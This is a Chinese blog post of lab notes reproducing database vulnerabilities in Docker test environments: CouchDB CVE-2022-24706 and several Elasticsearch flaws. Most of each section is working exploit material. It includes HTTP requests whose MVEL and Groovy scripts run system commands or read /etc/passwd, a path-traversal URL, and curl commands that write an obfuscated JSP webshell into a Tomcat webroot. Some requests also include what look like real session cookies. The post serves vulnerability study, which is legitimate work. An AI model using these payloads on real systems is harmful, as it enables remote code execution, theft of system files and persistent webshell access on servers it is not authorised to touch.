服务攻防-数据库-cve复现

最新推荐文章于 2024-08-14 23:54:36 发布
最新推荐文章于 2024-08-14 23:54:36 发布
阅读量899 收藏 25
点赞数 27
文章标签: 数据库 网络 网络安全 cve couchdb elastic search
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140567624
版权

CVE-2022-24706 Apache CouchDB 远程命令执行漏洞

漏洞简介

在`v3.2.2`版本之前的`Apache CouchDB`中,可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限,进而实现RCE ,漏洞编号CVE-2022-24706。除了需要满足版本需求外,漏洞触发还需有以下条件:

`4369` `epmd` 端口暴露至公网;

`Erlang`使用默认`Cookie` 值( `monster` );

目标主机防火墙未设置拦截访问任意端口。

利用者只需要完成以下操作:

使用`epmd`协议,与`epmd`程序进行交互查询其中的`erl`节点;

直接与`CouchDB`中的`erl`节点进行通信,接收节点发送来的`Challenge`;

向`CouchDB` `erl`节点发送根据`Challenge`计算的`hash`值;

`CouchDB` `erl`节点比对`hash`值相同后回复`Challenge ACK` 。

之后利用者可执行任意指令。

python3 exp.py 192.168.83.156 4369

CVE-2015-5531 Elasticsearch 目录遍历漏洞

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

先说说elasticsearch 的备份与快照功能

漏洞利用需要涉及到elasticsearch的备份功能,elasticsearch 提供了一套强大的API,使得elasticsearch备份非常简单

要实现备份功能。前提是elasticsearch 进程对备份目录有写入权限,一般来说我们可以利用/tmp 或者elasticsearch 自身的安装目录,默认情况下这两个目录elasticsearch 进程都是有写入权限的

漏洞描述

elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。

影响范围

1.6.1以下

访问网页

脚本攻击

Python2 cve-2015-5331.py 192.168.83.136 /etc/passwd

CVE-2014-3120 ElasticSearch 命令执行漏洞

漏洞简介

ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。

ElasticSearch有脚本执行的功能,使用的引擎为MVEL,该引擎没有做任何的防护,或者沙盒包装,所以可以直接执行任意代码。

由于在ElasticSearch的默认配置下,动态脚本执行功能处于打开状态,导致用户可以构造恶意的请求包,执行任意代码。

漏洞复现

通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码(如下图所示,ElasticSearch版本为1.1.1)

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

访问页面

对其抓包进行post并创建一条数据

POST /website/blog/  HTTP/1.1

Host: 192.168.83.136:9200

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Length: 30

{

  "name": "guiltyfet"

}

修改host即可

Rce执行成功了

GET /_search?pretty HTTP/1.1

Host: 192.168.83.136:9200

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: wp-settings-time-1=1713962065; csrftoken=knyTtnkWTvKWNFQH9Oyqvlxd5jnYqPRBfs8C4pOUDEyP6hqrYYzj7gzInSNIklET; sessionid=gbxdfwfon1c5ra1i1hdlj7v91d1ez6ej

Upgrade-Insecure-Requests: 1

Priority: u=1

Content-Length: 368



{

    "size": 1,

    "query": {

      "filtered": {

        "query": {

          "match_all": {

          }

        }

      }

    },

    "script_fields": {

        "command": {

            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"

        }

    }

}

    }

}

读取任意文件
GET /_search?pretty HTTP/1.1
Host: 192.168.83.136:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: wp-settings-time-1=1713962065; csrftoken=knyTtnkWTvKWNFQH9Oyqvlxd5jnYqPRBfs8C4pOUDEyP6hqrYYzj7gzInSNIklET; sessionid=gbxdfwfon1c5ra1i1hdlj7v91d1ez6ej
Upgrade-Insecure-Requests: 1
Priority: u=1
Content-Length: 347

{

    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },

    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\A\").next();"
        }
    }
}
    }
}

[ElasticSearch]CVE-2015-1427

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

抓包增加一个数据访问

POST /website/blog/  HTTP/1.1

Host: 192.168.83.136:9200

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Length: 30

{

  "name": "guiltyfet"

}

构造payload

GET /_search?pretty HTTP/1.1

Host: 192.168.83.136:9200

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: wp-settings-time-1=1713962065; csrftoken=knyTtnkWTvKWNFQH9Oyqvlxd5jnYqPRBfs8C4pOUDEyP6hqrYYzj7gzInSNIklET; sessionid=gbxdfwfon1c5ra1i1hdlj7v91d1ez6ej

Upgrade-Insecure-Requests: 1

Priority: u=1

Content-Length: 158



{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

任意命令执行成功了

ElasticSearch 目录穿越漏洞(CVE-2015-3337)

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

漏洞描述:

Elasticsearch是荷兰Elasticsearch公司的一套基于全文搜索引擎Apache Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引

在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

2.head插件提供了elasticsearch的前端页面,访问http://ip:9200/_plugin/head/ 即可看到

/_plugin/head/../../../../../../../../../etc/passwd

目录穿越读取铭感信息

WooYun-2015-110216 ElasticSearch写入webshell漏洞

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

简单介绍一下本测试环境。本测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在/usr/local/tomcat,web目录是/usr/local/tomcat/webapps;ElasticSearch目录在/usr/share/elasticsearch。

我们的目标就是利用ElasticSearch,在/usr/local/tomcat/webapps目录下写入我们的webshell。

1创建索引文件

POST /a.jsp/a.jsp/1 HTTP/1.1

Host: 192.168.83.136:9200

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: settingStore=1630480512401_0

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

Content-Length: 230

{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}

再创建一个恶意的存储库,其中location的值即为要写入的路径(需要根据肉鸡的tomcat的www目录来决定)

curl -XPOST http://192.168.83.136:9200/yz.jsp/yz.jsp/1 -d'

{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'

创建索引

curl -XPUT 'http://192.168.83.136:9200/_snapshot/yz.jsp' -d '{

     "type": "fs",

     "settings": {

          "location": "/usr/local/tomcat/webapps/wwwroot/",

          "compress": false

     }

}'

再创建一个恶意的存储库,其中location的值即为我要写入的路径。

curl -XPUT 'http://192.168.83.136:9200/_snapshot/yz.jsp' -d '{

     "type": "fs",

     "settings": {

          "location": "/usr/local/tomcat/webapps/wwwroot/",

          "compress": false

     }

}'

存储库验证并创建:

curl -XPUT "http://192.168.83.136:9200/_snapshot/yz.jsp/yz.jsp" -d '{

     "indices": "yz.jsp",

     "ignore_unavailable": "true",

     "include_global_state": false

}'

该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,如,

http://192.168.83.136:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=wooYun-2015-110216

访问test.jsp

http://192.168.83.136:8080/wwwroot/test.jsp

小春学渗透
关注
Cacti 前台SQL注入漏洞复现CVE-2023-39361)
0xSec
01-19 1053
该漏洞存在于graph_view.php文件中。默认情况下,访客用户无需身份验证即可访问graph_view.php,在启用情况下使用时会导致SQL注入漏洞。攻击者可能利用此漏洞执行远程代码或篡夺管理权限。Growth_right_pane_tree函数包含从graph_view.php文件调用的漏洞。在tree_content情况下,用户输入通过html_validate_tree_vars函数进行验证。如果tree_id参数大于0,则调用grow_right_pane_tree函数。
服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
m0_61506558的博客
12-20 748
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞
【漏洞复现CVE-2022-24706 CouchDB Erlang 分布式协议代码执行
m0_53121608的博客
07-13 697
【漏洞复现CVE-2022-24706 CouchDB Erlang 分布式协议代码执行
重要信息:关于 Oracle RAC 环境下 Apache Tomcat 漏洞(CVE-2024-21733)的解决方案
JiekeXu的博客
08-14 1852
作者 | JiekeXu来源 |公众号 JiekeXu DBA之路(ID: JiekeXu_IT)如需转载请联系授权 |(个人微信 ID:JiekeXu_DBA)大家好,我是 JiekeXu,江湖人称“强哥”,荣获 Oracle ACE Pro 称号,墨天轮 MVP,墨天轮年度“墨力之星”,拥有 Oracle 11g OCP/OCM 认证,MySQL 5.7/8.0 OCP 认证以及 PCA...
CouchDB Erlang 分布式协议代码执行 (CVE-2022-24706) vulhub漏洞复现
qq_53003652的博客
07-19 478
由于Erlang的特性,其支持分布式计算,分布式节点之间通过Erlang/OTP Distribution协议进行通信。攻击者如果知道通信时使用的Cookie,即可在握手包通过认证并执行任意命令。使用如下poc,该poc可以通过目标的4369端口epmd服务获取集群通信的端口,就是9100,再使用默认Cookie来控制节点执行任意命令。在CouchDB 3.2.1及以前版本中,使用了默认Cookie,值为“monster”。不过不用管,此漏洞只经过4369和9100。执行该poc可进行任意命令执行。
PostgreSQL 存在内存泄露漏洞(CVE-2022-41862)
murphysec的博客
03-09 1134
PostgreSQL是一个由PostgreSQL组织开发的自由对象关系型数据库管理系统。 该项目的受影响版本存在内存泄漏漏洞。该漏洞是由于在建立连接时采用libpq库建立连接的客户端对于接收的字节长度没有限制所导致的。 当libpq客户端缓存了Kerberos凭据并且没有显式禁用选项gssencmode时,攻击者便可控制PostgreSQL服务器在建立Kerberos传输加密时发送一个未终止的字符串,致使libpq客户端过度读取接收缓冲区后面的数据,包括未初始化的字节。继而,将这些未初始化的字节与错误
oracle之远程数据投毒漏洞(CVE-2012-1675)复现
weixin_68647219的博客
11-07 1736
CVE-2012-1675漏洞是Oracle允许攻击者在不提供用户名/密码的情况下,向远程“TNS Listener”组件处理的数据投毒的漏洞。举例:攻击者可以在不需要用户名密码的情况下利用网络中传送的数据消息(包括加密或者非加密的数据),如果结合(CVE-2012-3137漏洞进行密码破解)从而进一步影响甚至控制局域网内的任何一台数据库。COST 是class of secure transports 的缩写。是为了控制实例注册提供的一种安全控制机制。
网络安全全栈培训笔记(60-服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish)
qq_46343633的博客
02-02 1485
1、中间件-Weblogic安全2、中间件JB00S安全3、中间件-Jenkins:安全4、中间件-GlassFish安全。
服务攻防-框架安全&CVE 复现&Django&Flask&Node.JS&JQuery& Solr
m0_61506558的博客
12-21 353
(一)Python-开发框架安全-Django&FlaskDjango是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。感兴趣的可以看上面的文章,思路几乎是一致的,通过Fuzz测试出来的。
第六十四天 服务攻防-框架安全&CVE复现Apache shiro&Apache Solr
qq_46343633的博客
02-20 1814
Flask,jQuery等1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3.开发框架-Python-django-Flask4、开发框架-Javascript-Node.js-JQuery5、其他框架Java-Apache Shiro&Apache Sorl。
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 848
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
Jeecg-Boot 存在前台SQL注入漏洞(CVE-2023-1454)
nnn2188185的博客
04-10 6387
jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026、CVE-2024-21793)
0xSec
05-10 1067
当启用 LDAP时,BIG-IP Next Central Manager 版本20.0.1 - 20.1.0的API (URI) 中存在OData 注入漏洞,该漏洞存在于Central Manager 处理 OData 查询的方式中,可能导致未经身份验证的威胁者注入OData 查询过滤器参数,从而获取敏感信息,如管理员密码哈希等。
服务攻防-数据库安全&Redis&CouchDB&H2database&未授权访问&CVE漏洞
siu~
01-23 1319
1、数据库-Redis-未授权RCE&CVE 2、数据库-Couchdb-未授权RCE&CVE 3、数据库-H2database-未授权RCE&CVE 章节点: 1、目标判断-端口扫描&组合判断&信息来源 2、安全问题-配置不当&CVE漏洞&弱口令爆破 3、复现对象-数据库&中间件&开发框架&应用协议
Mysql-CVE-2012-2122漏洞&Redis漏洞
weixin_54882883的博客
07-20 431
这个漏洞呢现在还存在而且网上留意的话还能找到挺多的。这漏洞主要是6379端口他默认不设置密码导致的。Mysql-CVE-2012-2122漏洞。
【漏洞复现】Smanga未授权远程代码执行漏洞(CVE-2023-36076) 附加SQL注入+任意文件读取
做自己喜欢的事,并将其发挥到极致!
09-18 1086
无需配置,docker直装的漫画流媒体阅读工具。以emby plex为灵感,为解决漫画阅读需求而开发的漫画阅读器。在windows环境部署smanga安装环境面板,首先安装小皮面板,下载smanga项目,导入数据库,登录smanga,windows部署smanga。Smanga系统存在多处漏洞,攻击者可利用该漏洞获取服务器敏感数据信息。
Apache CouchDB 远程代码执行漏洞风险通告(CVE-2022-24706
云加速
05-01 775
Apachecouchdb官方发布安全通告,公告中修复了一个远程代码执行漏洞,漏洞编号CVE-2022-24706。可导致远程攻击者获得管理员权限等危害。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。漏洞详情Apache CouchDB数据库,它类似于Redis,Cassandra和MongoDB,也是一个NoSQL数据库CouchDB将数据存储为非关系性的JSON文档。 这使得CouchDB的用户可以以与现实世界相似的方式来存..
Microsoft Exchange 远程代码执行漏洞复现(CVE-2020-17144)
m0_48520508的博客
12-29 2047
0x00简介 Microsoft Exchange Server 2010可让IT专业人士感到更加可靠、灵活,使用户体验更加的良好,并且可以增强对业务通信的保护。 灵活可靠:Exchange Server 2010可让您根据自己公司的独特需求灵活地进行部署,并通过一种简化方式帮助您的用户不间断地使用电子邮件。 从任意位置访问:使用 Exchange Server 2010,您的用户可以从几乎所有平台、Web浏览器或设备安全自如地使用其所有通信工具(电子邮件、语音邮件、即时消息,等等),从而完成更多工作。
CVE-2014-3120 (命令执行漏洞)
浅笑996的博客
11-21 2507
环境配置 启动docker环境 cd vulhub-master/elasticsearch/CVE-2014-3120/ sudo docker-compose up 9200 端口已开启 访问目标的9200,会出现Elasticsearch的信息: 利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据,采用Burp发送数据包: POST /website/blog/ H...
复现cve-2017-1000112
最新发布
09-04
CVE-2017-1000112 是一个在 Linux 内核的 Netfilter 子系统中的本地权限提升漏洞。Netfilter 是 Linux 内核的一部分,用于允许或拒绝进入或发出数据包的网络连接。这个漏洞允许本地用户通过特定条件下的 Netlink 消息发送,在没有相应权限的情况下获得超级用户权限。 复现 CVE-2017-1000112 漏洞通常涉及以下步骤: 1. 确定系统是否易受攻击:首先需要确认运行的 Linux 内核版本是否存在该漏洞。可以通过查看内核版本号来初步判断。 2. 检查漏洞利用条件:这个漏洞需要存在一个已知的条件,例如,在某些特定的网络配置或内核编译选项下,才可能被成功利用。 3. 设置攻击环境:创建一个漏洞利用环境,可能需要配置一些特定的网络规则或者使用特定的内核模块。 4. 发送恶意 Netlink 消息:利用编写好的漏洞利用代码,发送精心构造的 Netlink 消息到受影响的系统。 5. 检查漏洞利用结果:如果漏洞成功被利用,那么本地用户可能会获得 root 权限。通常会通过查看命令行提示符前的用户权限标识或者执行 `id` 命令来确认。 为了安全起见,复现漏洞应在受控环境中进行,如虚拟机,并确保已经做好了充分的隔离和备份措施,以防止意外造成数据丢失或系统损坏。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值